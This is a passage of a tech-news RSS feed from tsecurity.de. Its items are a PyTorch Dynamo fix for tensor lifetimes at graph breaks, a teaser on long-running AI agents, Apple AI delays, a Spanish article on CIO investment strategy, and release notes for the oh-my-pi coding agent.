<link>https://tsecurity.de/de/3582856/downloads/viablestrict1780951453-dynamo-box-resume-frame-values-when-del-can-run-185561/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582856/downloads/viablestrict1780951453-dynamo-box-resume-frame-values-when-del-can-run-185561/</guid>
<pubDate>Mon, 08 Jun 2026 22:46:24 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Dynamo resume functions pass restored stack values and locals as normal<br>
positional arguments. CPython keeps those argument references alive for the<br>
whole resume call, so a <code>DELETE_FAST</code> in the resumed bytecode can remove the<br>
local name without actually releasing the tensor. That makes compiled graph<br>
breaks hold deleted intermediates longer than eager execution.</p>
<p>Detect resume functions that may execute <code>DELETE_FAST</code> after the resume target<br>
and use a boxed frame-values argument for those calls. The resume prologue now<br>
loads each saved stack/local value from the list, stores locals where needed,<br>
and clears each list slot immediately. Resume functions without a reachable<br>
<code>DELETE_FAST</code> keep the previous positional calling convention.</p>
<p>Nested resume calls need to preserve the child's calling convention, so nested<br>
boxed callees receive the frame-values list as one argument while non-boxed<br>
callees keep the existing list extension behavior.</p>
<p>This fixes the actionable resume-frame/intermediate lifetime issue and the<br>
issue-shaped list-cleared input path. Bare direct temporary inputs remain owned<br>
by the outer <code>torch.compile</code> wrapper's <code>*args</code> tuple until the compiled call<br>
returns; a pure Python <code>def wrapper(*args): return fn(*args)</code> has the same<br>
lifetime behavior, so this patch does not try to make <code>del x</code> release such<br>
bare inputs before return.</p>
<p>Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3068590996" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/153701" data-hovercard-type="issue" data-hovercard-url="/pytorch/pytorch/issues/153701/hovercard" href="https://github.com/pytorch/pytorch/issues/153701">#153701</a><br>
Generated by my agent</p>
<p>Test Plan:</p>
<ul>
<li>python test/dynamo/test_subgraphs.py SubGraphTests.test_nested_resume_del_releases_tensor SubGraphTests.test_resume_del_releases_tensor SubGraphTests.test_issue_shape_list_clear_and_intermediate_del_release_tensors SubGraphTests.test_del_compiled_only_local_before_graph_break</li>
<li>python test/dynamo/test_subgraphs.py</li>
<li>python test/dynamo/test_nested_graph_breaks.py -k test_step_graph_break_frame_values_not_corrupted</li>
<li>python test/dynamo/test_repros.py ReproTests.test_weakref_reconstruct ReproTests.test_weakref_del ReproTests.test_weakref_callback</li>
<li>lintrunner -a</li>
</ul>
<p>Benchmark Results:<br>
Tiny CPU graph-break runtime microbenchmark with <code>DELETE_FAST</code>, backend="eager",<br>
7 samples of 3000 cached calls each:</p>
<ul>
<li>Before: samples_us [26.349, 26.217, 26.076, 26.089, 26.544, 26.578, 26.099], median 26.217 us</li>
<li>After: samples_us [28.897, 29.262, 30.618, 29.686, 31.57, 32.353, 33.83], median 30.618 us (+16.8%)</li>
</ul>
<p>Pull Request resolved: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4543708479" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/185561" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/185561/hovercard" href="https://github.com/pytorch/pytorch/pull/185561">#185561</a><br>
Approved by: <a href="https://github.com/IvanKobzarev">https://github.com/IvanKobzarev</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Long-Running Agents]]></title>
<description><![CDATA[The following article originally appeared on Addy Osmani’s blog and is being reposted here with the author’s permission. A long-running AI agent can keep making progress over hours, days, or weeks. It can do this across many context windows and sandboxes, recover from failure, leave structured ar...]]></description>
<link>https://tsecurity.de/de/3582011/ai-nachrichten/long-running-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582011/ai-nachrichten/long-running-agents/</guid>
<pubDate>Mon, 08 Jun 2026 18:03:12 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The following article originally appeared on Addy Osmani’s blog and is being reposted here with the author’s permission. A long-running AI agent can keep making progress over hours, days, or weeks. It can do this across many context windows and sandboxes, recover from failure, leave structured artifacts behind, and resume where it left off. For […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Slow Apple Intelligence Upgrades Delay New Product Launches]]></title>
<description><![CDATA[Apple is facing hurdles bringing fresh ideas to the market because of internal software struggles. New hardware projects are reportedly on hold right now as the tech giant waits for its internal artificial intelligence systems to catch up. The slow rollout of these much-anticipated features has f...]]></description>
<link>https://tsecurity.de/de/3581536/ios-mac-os/slow-apple-intelligence-upgrades-delay-new-product-launches/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581536/ios-mac-os/slow-apple-intelligence-upgrades-delay-new-product-launches/</guid>
<pubDate>Mon, 08 Jun 2026 15:09:29 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple is facing hurdles bringing fresh ideas to the market because of internal software struggles. New hardware projects are reportedly on hold right now as the tech giant waits for its internal artificial intelligence systems to catch up. The slow rollout of these much-anticipated features has forced the company to delay several completely new product categories until the technology can meet basic performance standards.



Internal software delays put completely new hardware categories on hold



According to a recent report from Bloomberg, the company had grand plans for a wave of new hardware devices. These gadgets relied heavily on advanced AI capabilities to work properly. When the software teams could not deliver the needed intelligence features on time, the hardware releases had to be pushed back. Engineers realized that launching smart devices with outdated software would lead to a bad user experience. The hardware simply could not hide the software limitations.



The delayed devices reportedly include advanced smart home hubs and robotic tabletop screens. These products were designed from the ground up to be controlled by voice and automated systems rather than traditional touch screens. Without a highly capable digital assistant, these devices simply could not function as intended in a modern home setup.



A private executive meeting changed the corporate strategy completely



The situation reached a breaking point a while ago. Reports indicate that Apple leadership recognized the growing gap between its current software and competitor offerings. This realization led to a major shift in focus. Management gathered to address the growing problem with its digital assistant and evaluate the overall product roadmap.



During this critical gathering, executives realized that Siri was falling dangerously behind. The company decided to pause development on experimental hardware to pour all available resources into fixing the core software experience first. Fixing the foundation became the top priority for the engineering teams.



Future device launches depend on the success of software updates



Now, the timeline for any brand-new gadget category depends entirely on the software division. The upcoming presentation at WWDC 2026 is expected to showcase the first real results of this renewed focus on smart features. If the new iOS 27 updates prove reliable, hardware development might finally resume its normal pace. The hardware teams are essentially waiting for the green light from the software side.



Until the system can understand context and execute complex tasks reliably, the company will likely stick to updating its existing phones and computers. The tech industry is waiting to see if this massive shift in priorities pays off.



A successful software launch this year could open the door for those delayed smart home products to finally hit store shelves next year. It all comes down to getting the code right before introducing completely new physical products to buyers.]]></content:encoded>
</item>
<item>
<title><![CDATA[Claves para decidir inversiones en TI sin perder el rumbo]]></title>
<description><![CDATA[A medida que el impacto de las nuevas tecnologías en las diferentes áreas de la economía y la sociedad va creciendo, su relevancia a nivel financiero también. Hoy en día, el sector tecnológico vive inmerso en las noticias de inversiones mil millonarias, de cómo la inteligencia artificial lleva a ...]]></description>
<link>https://tsecurity.de/de/3580887/it-nachrichten/claves-para-decidir-inversiones-en-ti-sin-perder-el-rumbo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580887/it-nachrichten/claves-para-decidir-inversiones-en-ti-sin-perder-el-rumbo/</guid>
<pubDate>Mon, 08 Jun 2026 11:02:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A medida que <strong>el impacto de las nuevas tecnologías</strong> en las diferentes áreas de la economía y la sociedad va creciendo, su relevancia a nivel financiero también. Hoy en día, el sector tecnológico vive inmerso en las noticias de <a href="https://www.computerworld.es/article/4047406/la-economia-multimillonaria-de-la-inteligencia-artificial.html">inversiones mil millonarias</a>, de <a href="https://www.computerworld.es/article/4081769/nvidia-alcanza-una-valoracion-de-5-billones-de-dolares-gracias-al-auge-de-la-ia.html">cómo la inteligencia artificial lleva a valoraciones récord</a> o de las <a href="https://www.cio.com/article/4181288/como-impactaran-en-los-presupuestos-de-ia-de-los-cio-las-salidas-a-bolsa-de-anthropic-y-openai.html">potenciales salidas a bolsa</a> de las compañías que han revolucionado el ecosistema inteligente. Igualmente, la inversión en TI está creciendo a pasos agigantados: en 2026 se espera que el gasto total en esta partida crezca un 13,5%, hasta llegar a los 6,31 billones de dólares, según <a href="https://www.computerworld.es/article/4127025/el-gasto-en-ti-superara-los-6-billones-de-dolares-en-2026.html">estimaciones</a> de la consultora Gartner, que señala a la infraestructura de IA como principal impulsor. En España, se prevé que este año se incremente la inversión TI en un 2,8% y el gasto en un 2,9%, de acuerdo a un informe de LiceoTIC, organización del Grupo Setesca.</p>



<h2 class="wp-block-heading">De la estrategia conjunta a la inversión</h2>



<p>Estas cifras dan una idea de cómo la parte económica se está convirtiendo, cada vez más, en otro de los ejes del trabajo de las personas al cargo de la parte de TI. Sin embargo, en este contexto intenso, saber dónde poner el dinero no siempre es tarea fácil. “<strong>Lo esencial es partir de una estrategia tecnológica clara</strong>, explícitamente alineada con la estrategia de la compañía, y con una hoja de ruta priorizada que marque qué capacidades hay que construir y en qué horizonte”, resume por <em>mail </em><a href="https://www.cio.com/article/3855518/ana-penuela-kpmg-buscamos-convertir-al-cio-en-el-partner-estrategico-de-los-negocios-para-impulsar-la-digitalizacion.html">Ana Peñuela, socia de CIO Advisory en el área de Transformation &amp; Technology de KPMG España</a>. “Sin ese marco, la inversión en tecnología se vuelve reactiva y fragmentada”. </p>



<p>Para Peñuela, el o la CIO debe combinar tres factores: una vigilancia de tendencias que incorpore innovación con criterio, un modelo que permita comparar iniciativas en términos de valor, riesgo y coste, y una disciplina presupuestaria que equilibre estabilidad operativa, evolución del núcleo e innovación. “La clave no es invertir más, sino invertir mejor y de forma coherente en el tiempo”. Esta estrategia debe revisarse de forma periódica, para adaptarse a los cambios en el negocio, en las propias tecnologías o en el contexto internacional. Aunque Peñuela habla de unas pautas comunes, sí reconoce que “las decisiones concretas de inversión sí dependen en gran medida del modelo de negocio y del sector”.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/03/ANA_PENUELA-CIO.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Ana Peñuela, socia responsable CIO Advisory en KPMG, habla en entrevista para CIO España." class="wp-image-3855522" width="1024" height="603" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p><strong>Ana Peñuela, socia responsable CIO Advisory en KPMG.</strong></p></figcaption></figure><p class="imageCredit">KPMG</p></div>



<figure class="wp-block-pullquote"><blockquote><p><strong><em>“La clave no es invertir más, sino invertir mejor y de forma coherente en el tiempo”, recomienda Ana Peñuela</em></strong></p></blockquote></figure>



<p>La portavoz de KPMG apuesta por “una estrategia tecnológica liderada por el CIO, plenamente alineada con el CEO y el comité de dirección”, en la que la persona responsable de la parte de TI debe tener “una mirada de medio y largo plazo sobre los activos tecnológicos clave”, “capaz de traducir capacidades tecnológicas en impacto de negocio, evaluando no solo la necesidad inmediata de herramientas, sino también cómo esas decisiones construyen (o hipotecan) las capacidades futuras de la organización”. “La tecnología no se decide solo por funcionalidad, sino por su contribución a la sostenibilidad del modelo tecnológico”.</p>



<p>La estrategia del Grupo ACS se alinea con los puntos planteados por Peñuela. Su CIO y responsable de Sistemas y Tecnología, Félix Jimeno, alude al plan estratégico como elemento base, que el departamento de tecnología debe conocer para, en base a este, crear su plan director propio y preparar su planificación y presupuestos. “El negocio es el que marca hacia dónde quiere ir y <strong>nosotros, como departamento de tecnología, somos los que tenemos que soportar y dar las herramientas al negocio para que consiga sus objetivos</strong>”, apunta por videollamada, aunque con la parte indispensable de integrar las necesidades propias de TI o factores propios como la obsolescencia técnica. “Eso es sobre el papel”, incide, “porque tienes un plan director a tres años y luego llega la IA o la ciberseguridad y lo revoluciona todo. Entonces tienes que adaptarte”.</p>



<p>También en Amadeus van de la mano con el resto del negocio, según plantea Ángel Lorente, director de Corporate Strategy, en respuesta a cuestionario escrito. “En Amadeus, <strong>las inversiones en tecnología están guiadas por la creación de valor a largo plazo y por una estrecha alineación con las prioridades estratégicas de la compañía</strong>”. Entre sus principales vías de inversión identifica la adquisición de tecnología, el desarrollo de capacidades internas, la inversión en <em>startups </em>en sectores emergentes o la colaboración y el desarrollo conjunto con expertos especializados.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Angel-Lorente-Amadeus.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Ángel Lorente, director de Corporate Strategy de Amadeus" class="wp-image-4182180" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p><strong>Ángel Lorente, director de Corporate Strategy de Amadeus.</strong></p>
</figcaption></figure><p class="imageCredit">Amadeus</p></div>



<figure class="wp-block-pullquote"><blockquote><p><strong><em>“Nuestras inversiones en tecnología están guiadas por la creación de valor a largo plazo y por una estrecha alineación con las prioridades estratégicas de la compañía”, dice Ángel Lorente </em></strong></p></blockquote></figure>



<p>Para esto, su equipo trabaja con otros de la parte de producto y tecnología en la evaluación de distintos factores, como la alineación estratégica, valor o impacto para el cliente, las brechas en el porfolio, escalabilidad y rendimiento, plazos o consideraciones de coste como eficiencia y retorno de la inversión, “con el objetivo de seleccionar la vía más adecuada en cada caso”. “El enfoque de inversión tecnológica en Amadeus es colaborativo y claramente orientado al negocio: se trata de un proceso iterativo y continuo, no de un modelo puramente jerárquico”, resume, “ni exclusivamente ascendente”. Así, “los equipos trabajan activamente en identificar y cerrar brechas tecnológicas dentro de las hojas de ruta estratégicas”.</p>



<h2 class="wp-block-heading">Factores que impactan</h2>



<p>Precisamente IA y ciberseguridad son los dos factores que, señala, están impactando de forma importante desde el punto de vista de las políticas de compras o presupuestos -además de afectar al trabajo de los propios equipos-, aunque introduce un matiz. “La principal parte del presupuesto no se va en IA ni en ciberseguridad, pero es verdad que ocupan una parte ya relevante, y cada vez más”. Aquí entraría ese factor imprevisible del que hablaba, que ejemplifica con el <a href="https://www.computerworld.es/article/4178323/project-glasswing-detecta-10-000-vulnerabilidades.html">caso Mythos</a>. “El principal gasto económico está en mantener nuestros sistemas informáticos en el día a día. <strong>Todavía no hemos llegado a ese punto de que la IA y la ciberseguridad sea el 70 % del presupuesto</strong>”. Reconoce que el potencial de las herramientas inteligentes en el ahorro de tiempos y la mejora en seguridad está llevando a grandes inversiones por parte de determinadas compañías, que “puede dar la falsa sensación de que todo se invierte en IA. No, todo no se invierte en IA, pero poco a poco tiene más trascendencia”. Conviene aquí incluir un inciso de Ana Peñuela: “Tecnologías como la inteligencia artificial solo generan valor sostenible si la organización ha trabajado previamente aspectos clave como la madurez del dato, el gobierno, la ética y el modelo operativo. Sin esos fundamentos, el riesgo de frustración es alto”.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/04/imagen.jpg?quality=50&amp;strip=all" alt="Félix Jimeno" class="wp-image-3958126" width="800" height="533" sizes="auto, (max-width: 800px) 100vw, 800px"><figcaption class="wp-element-caption"><p>Félix Jimeno, CIO de ACS.</p></figcaption></figure><p class="imageCredit">Foundry</p></div>



<figure class="wp-block-pullquote"><blockquote><p><strong><em>“Todavía no hemos llegado a ese punto de que la IA y la ciberseguridad sea el 70% del presupuesto”, asegura Félix Jimeno</em></strong></p></blockquote></figure>



<p>Con todo esto en juego, se toman decisiones, continúa Jimeno. “Intentamos siempre utilizar el sentido común y saber que cada euro que invertimos va a tener un retorno”, sintetiza. “Muchas veces, para conseguir eso necesitamos invertir en innovación”. De ahí que hoy en día los departamentos de innovación proliferen en las compañías: áreas específicas que se encargan de conocer el entorno de trabajo, de evaluar tecnologías y estimar el retorno de la inversión. Estos deben ir de la mano de la parte de TI y de la de negocio. “Se respetan los roles”, resume, “todo hay que hacerlo de una manera consensuada”. Peñuela habla de una <strong>evolución en el rol de CIO</strong>. “Hoy es un partner estratégico del negocio, que anticipa oportunidades, alerta de riesgos y aporta criterio para priorizar inversiones. Cuando las decisiones se toman de forma aislada —solo desde TI o solo desde negocio— suele perderse valor. La gobernanza compartida es un factor crítico de éxito”.</p>



<p>Jimeno resume cuatro claves para la persona al cargo de la TI en relación a cómo invertir en tecnología. “Lo primero, <strong>que conozca bien su negocio</strong>”, tanto a nivel tecnológico como empresarial, con foco en la estrategia a futuro. “Lo segundo, que le dé muchísima importancia a la innovación”, en lo que incluye tanto conocer y probar herramientas como probar su viabilidad; “innovación ajustada a lo que es tu negocio”. Otra de las claves: la ciberseguridad y el trabajo con su CISO. “Y por último”, concluye, “ir de la mano las personas que están en los otros departamentos de la compañía”, lo que sería “la cadena de valor de la compañía”. Un mapa de referencia para navegar el intrincado mundo de la inversión en tecnología.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v15.9.0]]></title>
<description><![CDATA[@oh-my-pi/pi-ai
Fixed

Fixed MiniMax-compatible OpenAI-completions hosts (e.g. minimax-code-cn/MiniMax-M3) losing tool-call arguments when the stream delivers function.arguments as a complete object instead of the OpenAI JSON-string contract. The streaming buffer previously concatenated the objec...]]></description>
<link>https://tsecurity.de/de/3580239/tools/v1590/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580239/tools/v1590/</guid>
<pubDate>Mon, 08 Jun 2026 02:51:02 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-ai</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed MiniMax-compatible OpenAI-completions hosts (e.g. <code>minimax-code-cn/MiniMax-M3</code>) losing tool-call arguments when the stream delivers <code>function.arguments</code> as a complete object instead of the OpenAI JSON-string contract. The streaming buffer previously concatenated the object into a string, coercing it to <code>[object Object]</code> and leaving <code>bash</code>/<code>edit</code> calls with empty or malformed inputs; the tool-call block now holds the object payload directly. (<a href="https://github.com/can1357/oh-my-pi/issues/1776" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1776/hovercard">#1776</a>)</li>
<li>Fixed Cloud Code Assist (Gemini / Antigravity) rejecting tool schemas with <code>Invalid JSON payload received. Unknown name "propertyNames"</code> (HTTP 400) when a tool exposed a property literally named <code>properties</code> (e.g. the Resend MCP <code>create_contact</code> tool). The schema normalizer's <code>insideProperties</code> flag was re-asserted when descending into such a property's value schema, so Google-unsupported keywords (<code>propertyNames</code>, <code>additionalProperties</code>, …) nested inside it were never stripped. The flag is now only set when entering a real <code>properties</code> map from a schema node, not from within another <code>properties</code> map.</li>
<li>Fixed local/self-hosted providers leaking machine-specific endpoints into the bundled <code>models.json</code>. A <code>generate-models</code> run on a machine with a LiteLLM proxy baked 1202 <code>litellm</code> models pinned to <code>http://localhost:4000/v1</code> into the committed catalog. <code>litellm</code> (and <code>lm-studio</code>) now join <code>ollama</code>/<code>vllm</code> in the generator's discovery-only exclusion set, so local providers are never fetched during generation nor written to <code>models.json</code> — they are discovered dynamically at runtime instead. LiteLLM model discovery now enriches metadata against models.dev (the same reference source the other gateway providers use) rather than a bundled reference map. Added a regression test pinning the invariant (no local provider blocks, no loopback/private-network <code>baseUrl</code>s in the bundled catalog).</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Removed synchronous <code>readTextSync</code> from <code>SessionStorage</code> and core implementations (<code>MemorySessionStorage</code>, <code>FileSessionStorage</code>, <code>RedisSessionStorage</code>, <code>SqlSessionStorage</code>), requiring callers to use async text reads</li>
<li>Replaced the public <code>SessionStorage</code> <code>readTextPrefix(path, maxBytes)</code> and <code>readTextSuffix(path, maxBytes)</code> methods with <code>readTextSlices(path, prefixBytes, suffixBytes): Promise&lt;[string, string]&gt;</code>; custom session storage backends must implement the new combined slice API.</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added env-driven OpenTelemetry trace export. When <code>OTEL_EXPORTER_OTLP_ENDPOINT</code> (or <code>OTEL_EXPORTER_OTLP_TRACES_ENDPOINT</code>) is set, <code>omp</code> registers a global OTLP/proto trace exporter and switches on the agent loop's telemetry, so the <code>invoke_agent</code> / <code>chat</code> / <code>execute_tool</code> spans actually reach a collector instead of a no-op tracer. Honors the standard <code>OTEL_*</code> env contract (endpoint, headers, <code>OTEL_SERVICE_NAME</code>, <code>OTEL_SDK_DISABLED</code> and <code>OTEL_TRACES_EXPORTER=none</code> parsed case-insensitively) and the <code>OTEL_INSTRUMENTATION_GENAI_CAPTURE_MESSAGE_CONTENT</code> capture toggle; it is a no-op when no endpoint is configured. Only the <code>http/protobuf</code> transport is supported — a <code>grpc</code> or <code>http/json</code> <code>OTEL_EXPORTER_OTLP*_PROTOCOL</code> declines rather than misrouting spans. This makes the existing telemetry usable from headless hosts that run <code>omp</code> as a spawned child process, where an in-process <code>TracerProvider</code> registered by the parent can't reach the child. Uses the <code>@opentelemetry/exporter-trace-otlp-proto</code> 2.x line, which exports cleanly under Bun.</li>
</ul>
<h2>Fixed</h2>
<ul>
<li>Fixed the status line session name (and the editor border / status-line gap fill) being nearly illegible on light themes.</li>
<li>Added <code>IndexedSessionStorage</code> and <code>SessionStorageBackend</code> exports to support shared metadata-indexed session backends</li>
<li>Added the <code>tui.maxInlineImages</code> setting (default <code>8</code>) capping how many inline images render as live terminal graphics. Once a new image pushes the count past the cap, the oldest images are hidden via a full redraw — replaced by their <code>[Image: …]</code> text placeholder and purged from the terminal's graphics store — so long sessions with many screenshots/diagrams stop piling up images (and, on Kitty, stop leaving scrollback ghosts). Set to <code>0</code> to keep every image inline.</li>
<li>Added a "View: terminal state" item to the <code>/debug</code> menu that prints the detected terminal, live geometry and cell size, multiplexer, and the negotiated subprotocols actually in use — graphics (Kitty/iTerm2/Sixel), desktop notifications (BEL/OSC 9/OSC 99, plus whether OSC 99 was confirmed via a device-attributes probe), OSC 8 hyperlinks, 24-bit color, DECCARA rectangular-SGR background fills, and DEC 2026 synchronized output — alongside the scrollback-clear strategy (<code>CSI 22 J</code> vs <code>CSI 2 J</code> redraw / ED3 eager-erase risk) and the raw <code>TERM</code>/<code>TERM_PROGRAM</code>/<code>COLORTERM</code> detection signals.</li>
<li>Added a "Test: terminal protocols" item to the <code>/debug</code> menu that renders one live sample of every special escape protocol the renderer can emit — SGR text attributes (bold/italic/underline/strikethrough/inverse/dim), themed and 24-bit truecolor, OSC 8 hyperlinks, OSC 66 text sizing (large text), and an inline graphics swatch via the active image protocol (Kitty/iTerm2/Sixel, with a text fallback) — and fires a desktop notification, so you can eyeball which protocols the current terminal actually honors. The sample image is a gradient PNG generated in-process, so the graphics test needs no asset on disk.</li>
<li>Added the <code>tui.textSizing</code> setting (default off) that renders Markdown H1 headings at 2x scale via Kitty's OSC 66 text-sizing protocol. It replaces the undocumented <code>PI_TUI_TEXT_SIZING</code> env var with a real setting, and only takes effect on Kitty terminals (where OSC 66 is implemented) — it is ignored everywhere else so headings never emit raw escape bytes.</li>
<li>Added a lifecycle status to the <code>/resume</code> session picker. Each session's tail (last 32 KiB) is now read alongside the existing header window in a single pass, and its final message classified as <code>done</code> (the agent ended its turn and yielded control back), <code>interrupted</code> (a trailing tool call or tool result the loop never continued from), <code>aborted</code>, <code>error</code>, or <code>pending</code> (a trailing user message with no reply). The status renders as a colored segment on each session's metadata line. When the final message is larger than the tail window the status is omitted rather than guessed.</li>
<li>Added support for <code>disable-model-invocation: true</code> frontmatter field from the <a href="https://agentskills.io/specification" rel="nofollow">Agent Skills standard</a>. Skills using this field are now hidden from the system prompt listing, matching the behavior of <code>hide: true</code>.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed the <code>task</code> tool description to tag read-only agents and explicitly forbid assigning them file edits/commands or offloading reasoning to <code>quick_task</code>/<code>explore</code>.</li>
<li>Changed Redis and SQL session storage initialization to load only indexed metadata (<code>size</code>, <code>mtimeMs</code>) instead of full session content</li>
<li>Changed <code>SessionStorage</code> read paths to rely on backend-backed metadata/indexed storage, so session content is fetched on demand rather than cached as full in-memory mirrors</li>
<li>Changed session-list slice reads to go through <code>SessionStorage.readTextSlices</code> across all backends, removing the file-only single-open branch and caller-managed buffers. <code>FileSessionStorage</code> now reads both windows via <code>peekFileEnds</code>, while Redis and SQL backends encode session content once per combined read.</li>
<li>Changed the <code>ask</code> tool transcript renderer to mark single-choice questions with circular radio glyphs (<code>○</code>/<code>◉</code>) instead of the rectangular checkbox glyphs (<code>☐</code>/<code>☑</code>) it shares with multi-select questions, so a "pick one" combo box visually reads as a radio group rather than a checklist. Multi-select questions keep checkboxes. Added a <code>radio.selected</code>/<code>radio.unselected</code> symbol pair across the unicode, nerd-font, and ASCII presets.</li>
<li>Changed the <code>ask</code> tool transcript renderer to mark the chosen answer inside the question form rather than re-listing the questions in a detached summary block below it. Once a question is answered, the standalone prompt preview is dropped and the result redraws the same form — every offered option still shown, with the selected one(s) filled in (<code>◉</code>/<code>☑</code>, highlighted) and the rest dimmed (<code>○</code>/<code>☐</code>); custom free-text answers and cancellations render in place as the final entry. This removes the duplicate question/option listing that previously appeared once as the call preview and again as the result.</li>
<li>Changed task-completion and <code>ask</code> desktop notifications to structured terminal notifications (title, body, type, and a focus-on-click action). On Kitty these render through OSC 99 as a proper title/body with click-to-focus; terminals without confirmed OSC 99 support collapse them to the previous single-line message (BEL/OSC 9).</li>
<li>Updated the "each kitty/tmux split" tip to include cmux.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed tiny-model startup in compiled binaries by resolving <code>@huggingface/transformers</code> and its runtime dependencies from the installed cache using <code>package.json</code> <code>exports</code>/<code>main</code> metadata, preventing module-resolution failures when launching models</li>
<li>Fixed tiny runtime installation flow in compiled binaries by using the build-time resolved <code>@huggingface/transformers</code> version and ensuring the runtime lock directory’s parent exists before acquiring the install lock, preventing mismatch and setup failures on fresh installs</li>
<li>Fixed the terminal protocol debug probe reusing one stable Kitty graphics id across repeated panels, which could move/replace an earlier swatch instead of rendering a new one.</li>
<li>Fixed selector dialogs (the <code>ask</code> tool, hook prompts) collapsing to a single visible option on shorter terminals when options carried long descriptions: the highlighted option's wrapped description consumed the entire row budget, hiding every other option and making the menu feel unnavigable (down moved the lone visible entry, left/right did nothing). When the fully-expanded list overflows, <code>HookSelectorComponent</code> now renders a compact list — every option label stays on screen and only the highlighted option expands its description, truncated to the remaining rows — so the whole menu is always visible and the detail pane follows the cursor.</li>
<li>Fixed <code>read</code> failing with "Path not found" on web URLs whose scheme <code>//</code> collapsed to a single <code>/</code> (e.g. <code>https:/github.com/...</code>), which happens when a URL is routed through Node's <code>path.normalize</code>/<code>path.resolve</code>. The fetch URL recognizer now accepts a single-slash scheme and repairs it back to <code>//</code> before fetching, so collapsed URLs resolve instead of falling through to filesystem lookup.</li>
<li>Fixed subagent slow-model priority falling through to older Claude Opus aliases when Opus 4.8 is available by adding Opus 4.8 and 4.7 aliases ahead of older Opus fallbacks (<a href="https://github.com/can1357/oh-my-pi/issues/1753" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1753/hovercard">#1753</a>).</li>
<li>Fixed the web-search provider selectors in TUI settings/setup to derive from the shared provider metadata, so newly added providers cannot be omitted from the preference list.</li>
</ul>
<h2>@oh-my-pi/pi-natives</h2>
<h3>Fixed</h3>
<ul>
<li>Bounded sorted <code>glob()</code> scans to <code>maxResults</code> during uncached traversal and emitted <code>onMatch</code> callbacks only for entries admitted to the bounded top-<code>maxResults</code> heap so broad OMP <code>find</code> progress and timeout partials stay consistent with the returned mtime-ranked set while keeping parent-process memory bounded (<a href="https://github.com/can1357/oh-my-pi/issues/1761" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1761/hovercard">#1761</a>).</li>
<li>Fixed <code>wrapTextWithAnsi</code> hanging (infinite loop) on text containing a BEL-terminated string escape — DCS/SOS/PM/APC (<code>ESC P</code>/<code>ESC X</code>/<code>ESC ^</code>/<code>ESC _</code>) closed by <code>BEL</code> instead of <code>ST</code>. <code>ansi_seq_len_u16</code> only accepted the <code>ST</code> (<code>ESC \</code>) terminator for these (OSC already accepted both), so a BEL-terminated APC such as the TUI cursor marker (<code>ESC _ pi:c BEL</code>) was left unclassified: it was miscounted as visible width and <code>break_long_word</code>'s non-ESC scan could not advance past the <code>ESC</code>, spinning forever. The terminator set now matches OSC (ST <strong>or</strong> BEL), and <code>break_long_word</code> defensively emits and steps over any escape it cannot classify so a malformed/unknown sequence can never wedge the wrap loop.</li>
</ul>
<h2>@oh-my-pi/swarm-extension</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed swarm <code>/swarm run</code> failing with authStorage/modelRegistry identity error (<a href="https://github.com/can1357/oh-my-pi/issues/1472" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1472/hovercard">#1472</a>)</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Added</h3>
<ul>
<li>Added Kitty <code>CSI 22 J</code> screen-to-scrollback clears for non-destructive full paints, while keeping ED3 for destructive history/session rebuilds.</li>
<li>Added Kitty OSC 99 rich notification formatting and startup capability probing.</li>
<li>Added Kitty OSC 66 text-sized Markdown H1 headings (2x scale) plus native text-width support for OSC 66 spans. Off by default and gated to Kitty (the only terminal implementing OSC 66) via the <code>TERMINAL.textSizing</code> capability; hosts enable it through <code>setTextSizing</code>.</li>
